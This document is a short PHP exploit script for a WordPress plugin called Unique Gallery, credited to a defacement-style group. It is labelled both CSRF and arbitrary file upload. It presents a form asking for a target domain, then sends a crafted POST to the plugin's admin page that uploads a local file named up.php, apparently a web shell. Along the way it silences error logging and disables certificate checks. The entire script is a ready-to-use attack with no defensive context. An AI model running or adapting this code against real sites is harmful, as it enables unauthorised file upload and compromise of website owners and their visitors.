WP Unique Gallery (CSRF)

1. <?php
2. @session_start();
3. @error_reporting(0);
4. @ini_set('error_log',NULL);
5. @ini_set('log_errors',0);
6. @ini_set('display_errors', 0);
7. @set_time_limit(0);
8. /*
9. Name app : Wordpress Unique Gallery (AFU)
10. Author / Editor Script : AZZATSSINS CYBERSERKERS
11. Email : [email protected]
12. */
13. echo"<title>WordPress Unique Gallery AFU</title><center>
14. <body bgcolor=silver><u><i><b><h1>&copy; AZZATSSINS CYBERSERKERS</h1>
15. </b></i></u><br>
16.     <form method='post'>
17.     Domain: <br>
18.     <textarea placeholder='http://www.target.com/' name='url' style='width: 500px; height: 20px;'></textarea><br>
19.     <input type='submit' name='azzatssins' value='Fuck it...!'>
20.     </form>";
21.     $site = $_POST['url'];
22. if($_POST['azzatssins']) {
23. echo "<br><u><b>Target : ".$site."</b></u><br>";
24. $post = array(
25. "task" => "cpr_add_new_album",
26. "album_name" => "AZZATSSINS",
27. "album_desc" => "AZZATSSINS",
28. "album_img" => "@up.php",
29. );
30. $ch = curl_init ("$site/wp-admin/admin.php?page=unique_manage");
31. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
32. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
33. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
34. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
35. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
36. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
37. curl_setopt ($ch, CURLOPT_POST, 1);
38. @curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
39. $data = curl_exec ($ch);
40. curl_close ($ch);
41. }
42. ?>